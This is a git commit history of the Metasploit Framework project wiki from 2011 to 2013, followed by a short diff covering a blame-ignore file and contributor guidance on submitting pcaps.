todb-r7 e501322d87 Updated Metasploit Framework API Complaint Box (markdown) 2013-01-11 09:03:56 -08:00
todb-r7 4933c572eb send_request_cgi() gripe. 2013-01-11 09:02:47 -08:00
jlee-r7 8057e0d62f Updated Common Metasploit Module Bad Coding Practice (markdown) 2012-12-13 09:08:15 -08:00
jlee-r7 843d478975 Updated Common Metasploit Module Bad Coding Practice (markdown) 2012-12-13 09:06:21 -08:00
bturner-r7 505d415e58 Add version 4.5.0 2012-12-06 22:16:37 -08:00
bturner-r7 a04e289725 Add version 4.4.0 2012-12-06 15:35:58 -08:00
hmoore-r7 56188d8e7c Updated Contributing to Metasploit (markdown) 2012-11-07 18:30:54 -08:00
limhoff-r7 315b9425a9 HOWTO configure Rubymine to use hardtabs that are 4 spaces wide. 2012-10-09 07:52:51 -07:00
jlee-r7 5579e61244 Updated Exploit Ranking (markdown) 2012-10-05 14:28:59 -07:00
jlee-r7 1bed1aacfe Updated Exploit Ranking (markdown) 2012-10-05 14:28:27 -07:00
jlee-r7 842f5e0302 Updated Exploit Ranking (markdown) 2012-10-05 14:26:46 -07:00
jlee-r7 3a2942a963 Updated Exploit Ranking (markdown) 2012-10-05 14:23:04 -07:00
jlee-r7 3333279ad6 Updated Exploit Ranking (markdown) 2012-10-05 14:21:32 -07:00
jlee-r7 fd0d90bf2d typo 2012-10-01 10:35:42 -07:00
todb-r7 fd91b68f5d typo 2012-09-23 08:35:02 -07:00
todb-r7 04c0de41e5 More RVM machinations 2012-09-23 08:34:25 -07:00
todb-r7 835e193cfd RVM has gotten more complicated. Sigh. 2012-09-23 08:20:17 -07:00
Tod Beardsley b2232ef59d Updated Metasploit-Bug-Reporting (markdown) 2012-09-21 15:11:33 -05:00
Tod Beardsley 36b08f3f42 Updated Metasploit-Bug-Reporting (markdown)
Oh yeah, why you should care.
2012-09-21 15:08:04 -05:00
Tod Beardsley d926a0fc1d Updated Metasploit-Bug-Reporting (markdown) 2012-09-21 14:48:22 -05:00
Tod Beardsley e1572a3fa7 Updated Metasploit-Bug-Reporting (markdown)
This should be final-ish for review.
2012-09-21 14:48:22 -05:00
Tod Beardsley 08090aea1e Updated Metasploit-Bug-Reporting (markdown) 2012-09-21 14:48:22 -05:00
Tod Beardsley 2433dcc3f8 Updated Metasploit-Bug-Reporting (markdown) 2012-09-21 14:48:22 -05:00
Tod Beardsley 1eec83c209 searchable bugs. 2012-09-21 14:48:22 -05:00
Tod Beardsley 4f3550bd06 2012-09-21 14:48:22 -05:00
Tod Beardsley 42edd41336 avoiding dupes 2012-09-21 14:48:22 -05:00
Tod Beardsley 32936d3ece Reorganize the beginning. 2012-09-21 14:48:22 -05:00
Tod Beardsley a4b5c39d4c 2012-09-21 14:48:22 -05:00
Tod Beardsley 2913abf782 Reorg layout 2012-09-21 14:48:22 -05:00
Tod Beardsley 2339b635bd New bug reporting page! 2012-09-21 14:48:22 -05:00
jlee-r7 91e94448be Updated How payloads work (markdown) 2012-09-21 10:40:50 -07:00
jlee-r7 27fadee2b4 Updated How payloads work (markdown) 2012-09-21 10:39:46 -07:00
jlee-r7 a351812202 Created How payloads work (markdown) 2012-09-21 10:33:45 -07:00
todb-r7 994fddf169 Add an alternative method of getting RVM. 2012-09-11 14:39:16 -07:00
todb-r7 e87bb97f24 Destroyed Cleaning Up Remote Branches (markdown) 2012-07-02 07:59:41 -07:00
todb-r7 780f5d7c82 Updated Remote Branch Pruning (markdown) 2012-06-29 13:35:32 -07:00
todb-r7 2751425ce7 A procedure for deleting old branches. 2012-06-29 13:14:33 -07:00
todb-r7 e4ff40fefa Updated Metasploit Development Environment (markdown) 2012-06-28 12:27:58 -07:00
jlee-r7 c205278c64 Updated Metasploit Development Environment (markdown) 2012-06-25 14:38:56 -07:00
todb-r7 54908c1faa Writing down an outline and first bit of a merge strategy doc. 2012-06-25 07:29:34 -07:00
jlee-r7 1f671d1aab Created Git Gotchas (markdown) 2012-06-20 12:21:43 -07:00
wchen-r7 93077b5c6f Updated Common Metasploit Module Bad Coding Practice (markdown) 2012-05-22 09:37:35 -07:00
wchen-r7 799cb44297 Updated Common Metasploit Module Bad Coding Practice (markdown) 2012-05-22 08:48:13 -07:00
wchen-r7 5881755cd5 Created Common Metasploit Module Bad Coding Practice (markdown) 2012-05-22 08:37:15 -07:00
jlee-r7 ec641a649e Updated Using Metasploit (markdown) 2012-05-15 11:43:20 -07:00
todb-r7 5326853ef3 Don't code-ify the brackets, they don't render right. 2012-05-14 12:45:11 -07:00
jlee-r7 423c573595 Markdown doesn't like [[]] in code blocks, but it's fine with [], which are equivalent in this case 2012-05-14 11:52:45 -07:00
jlee-r7 a780b673d3 Updated Metasploit Development Environment (markdown) 2012-05-13 12:16:41 -07:00
jlee-r7 b79ac68194 Make text match screenshot 2012-05-13 12:16:10 -07:00
jlee-r7 c8f8504f66 Updated Using Git (markdown) 2012-05-13 11:25:26 -07:00
todb-r7 893ad3d49f Updated Metasploit Development Environment (markdown) 2012-05-09 05:25:08 -07:00
todb-r7 20e9bc3873 Updated Metasploit Development Environment (markdown) 2012-05-08 09:38:08 -07:00
todb-r7 50e1283b36 Updated Metasploit Development Environment (markdown) 2012-05-08 09:37:17 -07:00
todb-r7 860199925e Run through all the identified errata: sudo, rvmsudo, git fetch, and a couple other minor fixes. 2012-05-07 09:54:34 -07:00
todb-r7 bc447106c0 Updated Metasploit Development Environment (markdown) 2012-05-04 13:48:21 -07:00
tdoan-r7 dbd7c5ee57 updated "$ git clone github:mcfakepants/metasploit-framework.git" to "$ git clone git@github.com:mcfakepants/metasploit-framework.git" 2012-05-04 13:23:18 -07:00
tdoan-r7 9e3e7c95d3 changed "$ ssh-keygen -t -rsa -C "mcfakepants@packetfu.com"" to $ ssh-keygen -t rsa -C "mcfakepants@packetfu.com"" 2012-05-04 13:08:55 -07:00
tdoan-r7 238fb78b4d minor grammatical changes 2012-05-04 11:59:45 -07:00
todb-r7 f8205c6234 Updated Metasploit Development Environment (markdown) 2012-05-04 11:42:29 -07:00
todb-r7 0b7a02c175 Updated Metasploit Development Environment (markdown) 2012-05-04 11:29:01 -07:00
todb-r7 fcee9d09b1 Updated Metasploit Development Environment (markdown) 2012-05-04 11:24:49 -07:00
todb-r7 b8d3af2f20 Updated Using metasploit (markdown) 2012-05-04 11:20:15 -07:00
todb-r7 3acdcf7b7f Updated Metasploit Development Environment (markdown) 2012-05-04 11:16:17 -07:00
todb-r7 3c3447e628 Updated Metasploit Development Environment (markdown) 2012-05-04 11:14:49 -07:00
todb-r7 b2d0e0f19f Updated Metasploit Development Environment (markdown) 2012-05-04 11:14:19 -07:00
todb-r7 8d4b44b94f Updated Metasploit Development Environment (markdown) 2012-05-04 11:12:13 -07:00
todb-r7 641ba07713 Updated Home (markdown) 2012-05-04 10:55:43 -07:00
todb-r7 5810b113c0 Updated Home (markdown) 2012-05-04 10:54:43 -07:00
Tod Beardsley 3ffe1097eb 2012-05-04 12:53:57 -05:00
todb-r7 ff78393bb0 Updated Home (markdown) 2012-05-04 10:52:47 -07:00
todb-r7 9086f52a79 Updated Home (markdown) 2012-05-04 10:51:53 -07:00
todb-r7 c71f6a9845 Updated Home (markdown) 2012-05-04 10:50:45 -07:00
todb-r7 20d8620d5c Updated Home (markdown) 2012-05-04 10:50:23 -07:00
todb-r7 d609f57ab4 Updated Home (markdown) 2012-05-04 10:49:27 -07:00
todb-r7 bac30c62a0 Updated Welcome to the Metasploit Wiki! (markdown) 2012-05-04 10:47:31 -07:00
todb-r7 bc38ba0f91 Updated Home (markdown) 2012-05-04 10:46:41 -07:00
Tod Beardsley a67a13cdb7 2012-05-04 12:44:54 -05:00
Tod Beardsley b6630b4bb2 sidebar cleanup, final 2012-05-04 12:44:54 -05:00
Tod Beardsley a614e5d665 2012-05-04 12:44:54 -05:00
Tod Beardsley d373857521 2012-05-04 12:44:54 -05:00
Tod Beardsley d1e32e52d4 2012-05-04 12:44:54 -05:00
Tod Beardsley 14de0d000c 2012-05-04 12:44:54 -05:00
Tod Beardsley 194ecf15df 2012-05-04 12:44:54 -05:00
Tod Beardsley dd17e26b12 2012-05-04 12:44:54 -05:00
Tod Beardsley 484fa63e1d 2012-05-04 12:44:54 -05:00
Tod Beardsley c562a86ece 2012-05-04 12:44:54 -05:00
Tod Beardsley afef1948cc 2012-05-04 12:44:53 -05:00
Tod Beardsley f5af1590d6 2012-05-04 12:44:53 -05:00
Tod Beardsley ce984ee0ba 2012-05-04 12:44:53 -05:00
Tod Beardsley 9530a44b83 2012-05-04 12:44:53 -05:00
Tod Beardsley f25fba537e 2012-05-04 12:44:53 -05:00
Tod Beardsley a37f7a4015 2012-05-04 12:44:53 -05:00
Tod Beardsley 9742e2b3e8 2012-05-04 12:44:53 -05:00
Tod Beardsley 9525f25b10 2012-05-04 12:44:53 -05:00
Tod Beardsley 0f259f0b55 2012-05-04 12:44:53 -05:00
Tod Beardsley da3ecae6c2 2012-05-04 12:44:53 -05:00
Tod Beardsley 43593c79a5 2012-05-04 12:44:53 -05:00
Tod Beardsley e4da14086c 2012-05-04 12:44:53 -05:00
Tod Beardsley 3980f35adb 2012-05-04 12:44:53 -05:00
Tod Beardsley b0adb73477 removing a page 2012-05-04 12:44:53 -05:00
Tod Beardsley 6e23d426a5 2012-05-04 12:44:53 -05:00
Tod Beardsley 6c43448491 Sidebar cleanup 2012-05-04 12:44:53 -05:00
Tod Beardsley 786c5e9611 2012-05-04 12:44:53 -05:00
Tod Beardsley 022c722d4b Sidebar cleanup 2012-05-04 12:44:53 -05:00
Tod Beardsley 28ab508d28 2012-05-04 12:44:53 -05:00
Tod Beardsley 986f71f3f4 2012-05-04 12:44:53 -05:00
Tod Beardsley 623f89c9b9 2012-05-04 12:44:53 -05:00
Tod Beardsley dd7083d922 2012-05-04 12:44:53 -05:00
Tod Beardsley f84f736404 2012-05-04 12:44:53 -05:00
Tod Beardsley 0750c0aeb2 2012-05-04 12:44:53 -05:00
Tod Beardsley f9966dccb7 2012-05-04 12:44:53 -05:00
Tod Beardsley 3e4de6cc98 2012-05-04 12:44:53 -05:00
Tod Beardsley f5ebcae519 Adding the global sidebar 2012-05-04 12:44:53 -05:00
Tod Beardsley 9a8c3ab83c Adding the global sidebar 2012-05-04 12:44:53 -05:00
Tod Beardsley efeccfe356 2012-05-04 12:44:53 -05:00
Tod Beardsley a5ed7271b7 2012-05-04 12:44:53 -05:00
Tod Beardsley ac8f233a6e 2012-05-04 12:44:53 -05:00
Tod Beardsley 06925f7a8a 2012-05-04 12:44:53 -05:00
Tod Beardsley 2e6b1b0d53 2012-05-04 12:44:53 -05:00
Tod Beardsley 8bef2f879f removing a screen 2012-05-04 12:44:53 -05:00
Tod Beardsley 6479f62aef adding screens 2012-05-04 12:44:53 -05:00
Tod Beardsley f72beb28b8 adding screen 2012-05-04 12:44:53 -05:00
Tod Beardsley 34010bceb0 2012-05-04 12:44:53 -05:00
Tod Beardsley 72e345f7f5 2012-05-04 12:44:53 -05:00
Tod Beardsley 6e56205144 2012-05-04 12:44:53 -05:00
Tod Beardsley 0841212431 adding screens 2012-05-04 12:44:53 -05:00
Tod Beardsley 62bd5e5721 2012-05-04 12:44:53 -05:00
Tod Beardsley 7f03097248 2012-05-04 12:44:53 -05:00
Tod Beardsley 4d87fc92f2 2012-05-04 12:44:53 -05:00
Tod Beardsley f9a7adcc88 2012-05-04 12:44:53 -05:00
Tod Beardsley e147c75e89 2012-05-04 12:44:53 -05:00
Tod Beardsley 1c5451f225 2012-05-04 12:44:52 -05:00
Tod Beardsley 17d0325014 2012-05-04 12:44:52 -05:00
Tod Beardsley 282756324f 2012-05-04 12:44:52 -05:00
Tod Beardsley 1eac8925b5 adding screens 2012-05-04 12:44:52 -05:00
Tod Beardsley 0151dd18f2 adding screens 2012-05-04 12:44:52 -05:00
Tod Beardsley 5d91b490f9 2012-05-04 12:44:52 -05:00
Tod Beardsley afc11bb91b 2012-05-04 12:44:52 -05:00
Tod Beardsley e21a5dceed 2012-05-04 12:44:52 -05:00
Tod Beardsley ead729ab8d special sidebar 2012-05-04 12:44:52 -05:00
Tod Beardsley e7de9bb225 2012-05-04 12:44:52 -05:00
Tod Beardsley c5025379ac 2012-05-04 12:44:52 -05:00
Tod Beardsley 70de24526b 2012-05-04 12:44:52 -05:00
Tod Beardsley 8a993627a8 Adding fork06 2012-05-04 12:44:52 -05:00
Tod Beardsley 296b213a52 2012-05-04 12:44:52 -05:00
Tod Beardsley dc309fca1a 2012-05-04 12:44:52 -05:00
Tod Beardsley c33f0d30cd 2012-05-04 12:44:52 -05:00
Tod Beardsley 063f7b4308 2012-05-04 12:44:52 -05:00
Tod Beardsley 67adc5db6f 2012-05-04 12:44:52 -05:00
Tod Beardsley a598cd2566 2012-05-04 12:44:52 -05:00
Tod Beardsley 48b422eed3 2012-05-04 12:44:52 -05:00
Tod Beardsley ea10ba4a40 2012-05-04 12:44:52 -05:00
Tod Beardsley 6ee6fe7261 2012-05-04 12:44:52 -05:00
Tod Beardsley 7ed345d680 shading 2012-05-04 12:44:52 -05:00
Tod Beardsley e6685fa164 shading 2012-05-04 12:44:52 -05:00
Tod Beardsley b98c826228 shading 2012-05-04 12:44:52 -05:00
Tod Beardsley c0a6c27ba5 shading 2012-05-04 12:44:52 -05:00
Tod Beardsley b86ee301c2 2012-05-04 12:44:52 -05:00
Tod Beardsley 82fce8d6a5 adding ssh screen 2012-05-04 12:44:52 -05:00
Tod Beardsley 3c7a8d9843 Hilighting 2012-05-04 12:44:52 -05:00
Tod Beardsley 49f4cfdeab 2012-05-04 12:44:52 -05:00
Tod Beardsley 935402790d Hilighting ssh05.png 2012-05-04 12:44:52 -05:00
Tod Beardsley bebae7475a Hilighting ssh02.png 2012-05-04 12:44:52 -05:00
Tod Beardsley 654cf5d2d5 Adding an ssh screen 2012-05-04 12:44:52 -05:00
Tod Beardsley bea7de531e 2012-05-04 12:44:52 -05:00
Tod Beardsley 5f46df170c Adding ssh screens 2012-05-04 12:44:52 -05:00
Tod Beardsley a9c03bd326 2012-05-04 12:44:52 -05:00
Tod Beardsley 5814edff15 2012-05-04 12:44:52 -05:00
Tod Beardsley d9b3bb97f2 Adding new user screenshots 2012-05-04 12:44:52 -05:00
Tod Beardsley f41772113e Removing sidebar for now. 2012-05-04 12:44:51 -05:00
Tod Beardsley 9945bc3279 2012-05-04 12:44:51 -05:00
Tod Beardsley bc9a0928c4 2012-05-04 12:44:51 -05:00
Tod Beardsley 9286f01f03 2012-05-04 12:44:51 -05:00
Tod Beardsley 6eb2ddeb66 2012-05-04 12:44:51 -05:00
Tod Beardsley 6f02ee253e 2012-05-04 12:44:51 -05:00
Tod Beardsley 50cd0ad7ab 2012-05-04 12:44:51 -05:00
Tod Beardsley 0bfd87a1a0 2012-05-04 12:44:51 -05:00
Tod Beardsley a2311e190e 2012-05-04 12:44:51 -05:00
Tod Beardsley 15c65c2be1 2012-05-04 12:44:51 -05:00
Tod Beardsley a53d15c266 2012-05-04 12:44:51 -05:00
Tod Beardsley 2a3f395881 Adding sidebar content. 2012-05-04 12:44:51 -05:00
Tod Beardsley c8637fd2b5 Adding a Sidebar for dev 2012-05-04 12:44:51 -05:00
Tod Beardsley b42d28610f Moving dev stuff to /dev 2012-05-04 12:44:51 -05:00
Tod Beardsley 50d372c7bd 2012-05-04 12:44:51 -05:00
Tod Beardsley bbecb84ab6 2012-05-04 12:44:51 -05:00
Tod Beardsley 012037ba9c 2012-05-04 12:44:51 -05:00
Tod Beardsley 02b9843b80 Adding a toplevel Sidebar 2012-05-04 12:44:51 -05:00
Tod Beardsley 849d0bb845 2012-05-04 12:44:51 -05:00
Tod Beardsley 856a37c291 Moving screenshot to screens subdir 2012-05-04 12:44:51 -05:00
Tod Beardsley 7ba6a6fb7f 2012-05-04 12:44:51 -05:00
Tod Beardsley f2414d81a4 Adding rvm02.png screenshot 2012-05-04 12:44:51 -05:00
Tod Beardsley 75810b4993 2012-05-04 12:44:51 -05:00
Tod Beardsley 9993db3e73 2012-05-04 12:44:51 -05:00
Tod Beardsley 8979eb7205 2012-05-04 12:44:51 -05:00
Tod Beardsley a953ad9237 2012-05-04 12:44:51 -05:00
Tod Beardsley 795846476a 2012-05-04 12:44:51 -05:00
Tod Beardsley 48df5e67d6 2012-05-04 12:44:51 -05:00
Tod Beardsley ef4b5fa053 2012-05-04 12:44:51 -05:00
Tod Beardsley fdefcf147c Initial outline and some content. 2012-05-04 12:44:51 -05:00
hmoore-r7 a58f8c990b Updated Metasploit Combined Installers (textile) 2012-05-02 22:20:24 -07:00
hmoore-r7 a89dbd6484 Updated Metasploit Combined Installers (textile) 2012-05-01 23:37:23 -07:00
hmoore-r7 a0db423e16 Updated Metasploit Combined Installers (textile) 2012-05-01 23:33:48 -07:00
hmoore-r7 251923f4ad Updated Metasploit Combined Installers (textile) 2012-04-24 21:23:02 -07:00
hmoore-r7 b3be9d5542 Updated Metasploit Combined Installers (textile) 2012-04-24 21:19:38 -07:00
hmoore-r7 3458c175c0 Updated Metasploit Combined Installers (textile) 2012-04-24 21:13:17 -07:00
hmoore-r7 6f53ac4aae Updated Metasploit Installers (textile) 2012-04-24 21:11:22 -07:00
hmoore-r7 b40020b843 Created Downloads by Version (textile) 2012-04-24 21:00:22 -07:00
hmoore-r7 1dffbec1c6 Destroyed 4.3 Release Note Collaboration (markdown) 2012-04-14 18:29:39 -07:00
trosen-r7 d2bca69c1a Updated 4.3 Release Note Collaboration (markdown) 2012-04-14 18:12:43 -07:00
trosen-r7 d2709b4c5b Updated 4.3 Release Note Collaboration (markdown) 2012-04-14 18:12:25 -07:00
trosen-r7 5ed51dfed9 Updated 4.3 Release Note Collaboration (markdown) 2012-04-14 18:12:02 -07:00
trosen-r7 3f4e51452b Updated 4.3 Release Note Collaboration (markdown) 2012-04-14 18:10:29 -07:00
hmoore-r7 ea21e941fa Updated 4.3 Release Note Collaboration (markdown) 2012-04-14 18:01:48 -07:00
hmoore-r7 be63d4197d Updated 4.3 Release Note Collaboration (markdown) 2012-04-14 18:00:41 -07:00
hmoore-r7 e217e0e382 Updated 4.3 Release Note Collaboration (markdown) 2012-04-14 18:00:02 -07:00
hmoore-r7 51a6243deb Created 4.3 Release Note Collaboration (markdown) 2012-04-14 17:56:40 -07:00
jlee-r7 0fb47d8cc4 Updated Exploit Ranking (markdown) 2012-04-13 15:17:26 -07:00
jlee-r7 077b1d87c0 Updated Exploit Ranking (markdown) 2012-04-13 15:12:00 -07:00
jlee-r7 ddd025ad1c Updated Exploit Ranking (markdown) 2012-04-13 15:11:40 -07:00
jlee-r7 776d258329 Updated Exploit Ranking (markdown) 2012-04-13 15:06:41 -07:00
jlee-r7 fddfcf2c0e Created Exploit Ranking (markdown) 2012-04-13 15:05:56 -07:00
jlee-r7 35fe8e61d3 Updated Home (markdown) 2012-04-10 18:49:37 -07:00
wchen-r7 62afb115bf Updated Want to get your feet wet? Start here. (markdown) 2012-04-09 18:11:07 -07:00
wchen-r7 6a8e369e56 Updated Want to get your feet wet? Start here. (markdown) 2012-04-09 18:09:34 -07:00
wchen-r7 8b2b853d6c Updated Want to get your feet wet? Start here. (markdown) 2012-04-09 18:03:12 -07:00
jlee-r7 cf61fbb738 Updated Using metasploit (markdown) 2012-03-27 11:45:50 -07:00
jlee-r7 3325f8eaaa Updated Using metasploit (markdown) 2012-03-27 11:45:39 -07:00
jlee-r7 046fb1698e Updated Using metasploit (markdown) 2012-03-27 11:45:07 -07:00
jlee-r7 29fccf4a99 Updated Using metasploit (markdown) 2012-03-27 11:44:23 -07:00
jlee-r7 8e4fd0c23b Created Using metasploit (markdown) 2012-03-27 11:41:48 -07:00
jlee-r7 5193b32caf Updated Home (markdown) 2012-03-27 11:29:08 -07:00
jcran-r7 2f5e04c9b0 Updated Working with the Framework Repo (markdown) 2012-03-23 14:00:32 -07:00
todb-r7 fda98fee3c Updated Style Tips (markdown) 2012-03-19 09:51:43 -07:00
todb-r7 97aa5758c1 Adding a grammar section. 2012-03-19 09:47:24 -07:00
jlee-r7 c9e4bddfc8 Updated Evading Anti Virus (markdown) 2012-02-28 09:05:12 -08:00
jlee-r7 8a1c79041b Updated Read these links (markdown) 2012-02-28 09:04:55 -08:00
jlee-r7 9424bae7b2 Updated Read these links (markdown) 2012-02-28 09:04:38 -08:00
jlee-r7 0ea620d3d0 Updated Evading Anti Virus (markdown) 2012-02-28 09:04:19 -08:00
jlee-r7 33d1ccf1a0 Created Evading Anti Virus (markdown) 2012-02-28 09:04:06 -08:00
jlee-r7 04e4bf5f70 Updated Style Tips (markdown) 2012-02-03 08:59:41 -08:00
jlee-r7 191b2d67b1 Updated Style Tips (markdown) 2012-02-03 08:46:54 -08:00
jlee-r7 32228982f5 Updated Acceptance Guidelines (markdown) 2012-02-02 14:57:35 -08:00
James Lee fe30c22880 Add a link to Style-Tips 2012-02-02 15:44:31 -07:00
James Lee ed10c4a75b Add some comments to make the settings more readable 2012-02-02 15:34:51 -07:00
James Lee aac9f8af33 Add a page with editor tips
Jus vim for now since that's all I use
2012-02-02 15:10:50 -07:00
Matt Buck b653c12608 Remove local rvmrc and add to gitignore. 2012-02-01 12:14:14 -06:00
mbuck-r7 fb14437e18 Updated Git Reference Sites (markdown) 2012-01-12 09:14:28 -08:00
mbuck-r7 b2a8f249ba Added "git - The Simple Guide" to list of resources. 2012-01-09 14:21:45 -08:00
todb-r7 c0dc301d73 Updated Want to get your feet wet? Start here. (markdown) 2011-12-27 08:54:11 -08:00
todb-r7 c93076d677 Updated Want to get your feet wet? Start here. (markdown) 2011-12-27 08:30:10 -08:00
todb-r7 72b02ed696 Updated Want to get your feet wet? Start here. (markdown) 2011-12-27 08:24:24 -08:00
todb-r7 0ecaa5c4a5 Updated Want to get your feet wet? Start here. (markdown) 2011-12-27 08:20:16 -08:00
todb-r7 f1015cd674 Taking Open TFTP off the list, adding Snort, TightVNC 2011-12-23 09:00:26 -08:00
Matt Buck 653c73a5a7 Add a section on cleaning up remote branches. 2011-12-09 14:25:17 -05:00
mbuck-r7 cfa3958d84 Move a sentence for clarity. 2011-12-02 15:36:30 -08:00
mbuck-r7 8b6bcd530e Fix image tag links. 2011-12-02 15:35:32 -08:00
Matt Buck 75af2e09ea Add Mou files to Gitignore. 2011-12-02 17:33:52 -06:00
Matt Buck 537b872744 Add section on landing pull requests. 2011-12-02 17:33:38 -06:00
dmaloney-r7 93542d0471 Updated Git cheatsheet (markdown) 2011-12-02 10:54:34 -08:00
dmaloney-r7 97e3b9febb Updated Git cheatsheet (markdown) 2011-12-02 10:53:43 -08:00
dmaloney-r7 a20507dcd6 Updated Git cheatsheet (markdown) 2011-12-02 10:51:32 -08:00
dmaloney-r7 0e7e35695f Updated Git Cheatsheet (survival level) (markdown) 2011-12-01 11:03:01 -08:00
todb-r7 7aa1b3f602 Dropping CVE-2044-2111 from the getting started wiki as it is about to be committed. Need to replace this with a new candidate. 2011-12-01 10:25:11 -08:00
todb-r7 24ff7b3eb7 Updated Want to get your feet wet? Start here. (markdown) 2011-11-21 08:00:19 -08:00
todb-r7 f466234024 Updated Want to get your feet wet? Start here. (markdown) 2011-11-21 07:59:48 -08:00
todb-r7 00675268da Adding a link for contributing to Metasploit 2011-11-14 19:07:10 -08:00
Matt Buck cc03e08547 Remove extra page. 2011-11-14 17:31:52 -06:00
todb-r7 8a0327ae23 Updated Want to get your feet wet? Start here. (markdown) 2011-11-14 15:17:25 -08:00
todb-r7 9ddc59bf19 Updated Want to get your feet wet? Start here. (markdown) 2011-11-14 15:16:18 -08:00
todb-r7 3b37d0f364 Updated Want to get your feet wet? Start here. (markdown) 2011-11-14 15:15:47 -08:00
todb-r7 93b3dc0514 Updated Want to get your feet wet? Start here. (markdown) 2011-11-14 15:14:45 -08:00
todb-r7 fc235a79b2 Updated Want to get your feet wet? Start here. (markdown) 2011-11-14 15:13:52 -08:00
todb-r7 46c4377147 Adding a getting started on modules for newbies 2011-11-14 15:12:38 -08:00
Matt Buck 6d7330b0ee Change Create to Send. 2011-11-10 17:00:47 -06:00
Matt Buck f8e2c88443 Fix typo. 2011-11-10 17:00:11 -06:00
Matt Buck 8580e4b1c3 Fix link for topic branches. 2011-11-10 16:59:06 -06:00
Matt Buck f0a8c90919 Add complete working with repo page. 2011-11-10 16:58:03 -06:00
Matt Buck 2d7eda8ba7 Fixing merge conflict. 2011-11-10 16:56:28 -06:00
Matt Buck 7c6a48aa35 Add framework page to sidebar for git section. 2011-11-10 16:55:38 -06:00
Matt Buck 27598e6bb2 2011-11-10 16:54:22 -06:00
Matt Buck b079c675c5 Add full path to image link. 2011-11-10 15:37:56 -06:00
Matt Buck 8d1a732985 Add step about forking. 2011-11-10 15:37:15 -06:00
todb-r7 ac1ff3fd25 Adding acceptance guidelines to the front page of the wiki 2011-11-10 13:08:34 -08:00
Matt Buck 41a1188348 Add acceptance guidelines to wiki. 2011-11-10 14:29:55 -06:00
todb-r7 5dd49d2505 link to HACKING and msftidy 2011-11-10 11:12:01 -08:00
todb-r7 9d254966cb spelling slowloris duh 2011-11-10 11:03:17 -08:00
hmoore-r7 b6ceec2852 Updated Acceptance Guidelines (markdown) 2011-11-10 11:01:16 -08:00
todb-r7 46480740d7 Adding an acceptance doc 2011-11-10 10:54:40 -08:00
Matt Buck 8219d83ed7 Test this syntax highlighting. 2011-11-09 21:26:22 -06:00
Matt Buck 5ba3dbd248 Test the console highlighting. 2011-11-09 21:24:45 -06:00
Matt Buck 61ce74aa60 Add a walkthrough for contributors. 2011-11-09 21:11:27 -06:00
Matt Buck 5801d3b336 Add rvmrc. 2011-11-09 21:11:06 -06:00
Matt Buck 397767c1b9 Reformat header for cheatsheet. 2011-11-09 17:03:52 -06:00
Matt Buck 3d25ce39f7 Reformat sidebar. Once more from the top. 2011-11-09 17:02:47 -06:00
Matt Buck 8a36139ccc Reformat sidebar again. 2011-11-09 17:02:12 -06:00
Matt Buck 267d8f535e Reformat sidebar. 2011-11-09 17:01:40 -06:00
Matt Buck b273b49078 Add a git sidebar. 2011-11-09 16:57:13 -06:00
Matt Buck 69ce65ec83 Okay, add TOC back. 2011-11-09 16:55:37 -06:00
Matt Buck 0d1d0dc82e Use two brackets. 2011-11-09 16:55:10 -06:00
Matt Buck 481588f868 Drop the TOC header. 2011-11-09 16:54:46 -06:00
Matt Buck 0282fa8e0d Add git section. 2011-11-09 16:53:43 -06:00
Matt Buck aba8ed88d0 Add git section. 2011-11-09 16:53:39 -06:00
trevrosen ce50b89296 Updated Git Cheatsheet (markdown) 2011-11-01 13:14:01 -07:00
trevrosen d2f6cdc4a0 Updated Git Cheatsheet (markdown) 2011-11-01 13:13:18 -07:00
trevrosen 0c14b1e6f7 added git in bash section 2011-11-01 07:27:22 -07:00
trevrosen 55c9c7d025 how could I forget git status? 2011-10-31 15:07:46 -07:00
trevrosen df6784c7ab Updated Git Cheatsheet (markdown) 2011-10-31 12:27:49 -07:00
trevrosen e754419417 Added stuff for Fugitive(Vim) and TextMate 2011-10-31 12:17:56 -07:00
trevrosen ceafa42cc3 Updated How do I...? (markdown) 2011-10-31 11:57:28 -07:00
trevrosen 1f38a4cc5d Created Git cheatsheet (markdown) 2011-10-31 11:56:52 -07:00
trevrosen 4dc1094b77 Updated Git Reference Sites (markdown) 2011-10-28 12:20:15 -07:00
techpeace 616eef47f7 Added "Git is Easier Than You Think" link. 2011-09-07 14:59:58 -07:00
techpeace 956b8c1054 Added GitHub Flow post. 2011-08-31 13:00:18 -07:00
gjw 2cff4a5a3b Updated Git Reference Sites (markdown) 2011-08-31 11:26:15 -07:00
gjw 768de66657 Updated Git Reference Sites (markdown) 2011-08-31 11:25:21 -07:00
techpeace 17a539764a Added a couple more Git sites. 2011-08-31 11:08:44 -07:00
techpeace 6cd0a477c7 Updated Get Reference Sites (markdown) 2011-08-31 10:59:30 -07:00
techpeace e25fd56ebe Updated Reference Sites (markdown) 2011-08-31 10:59:16 -07:00
techpeace 96bbe5d26a Updated Reference Sites (markdown) 2011-08-31 10:57:12 -07:00
techpeace 68a50e40f7 Updated Reference Sites (markdown) 2011-08-31 10:56:05 -07:00
techpeace 0f3d3680f1 Updated Reference Sites (markdown) 2011-08-31 10:55:45 -07:00
techpeace 75145afed2 Initial version 2011-08-31 10:55:11 -07:00
hdm 99b4419394 Updated Home (markdown) 2011-08-30 07:56:13 -07:00
rapid7 0c5f53133c Initial Commit 2011-08-30 07:55:51 -07:00
2493 changed files with 167777 additions and 37119 deletions
+15
View File
@@ -0,0 +1,15 @@
# This file aims to document any commits which should be ignored from Git/Github history
# Only whitespace changes should be added to this file where possible
#
# Additional details:
# https://docs.github.com/en/repositories/working-with-files/using-files/viewing-a-file#ignore-commits-in-the-blame-view
#
# 2013: Retabbing the majority of Metasploit Framework to use two-space soft tabs instead of hard tabs
7e5e0f7fc814fee55a1eca148c51f2344da65e59
41e4375e43443bb568729a3079d3bf9944cbc669
84aaf2334ae2de73f27999d4c003448c8e891d3a
9f3a5dc5d0424c2c1a067b140b1642319dee65c2
# 2022: Fixing whitespace on the tests folder with "rubocop --fix-layout test"
29cc349649f978304712dd0c31dc8861e9627209
+1
View File
@@ -31,3 +31,4 @@ Complex Software Examples:
We will also accept demonstrations of successful module execution even if your module doesn't meet the above conditions. It's not a necessity, but it may help us land your module faster!
Demonstration of successful module execution can take the form of a packet capture (pcap) or a screen recording. You can send pcaps and recordings to [msfdev@metasploit.com](mailto:msfdev@metasploit.com). Please include a CVE number in the subject header (if applicable), and a link to your PR in the email body.
If you wish to sanitize your pcap, please see the [wiki](https://github.com/rapid7/metasploit-framework/wiki/Sanitizing-PCAPs).
+1 -1
View File
@@ -7,7 +7,7 @@ us know in the way that's most comfortable for you.
## Via ZenDesk
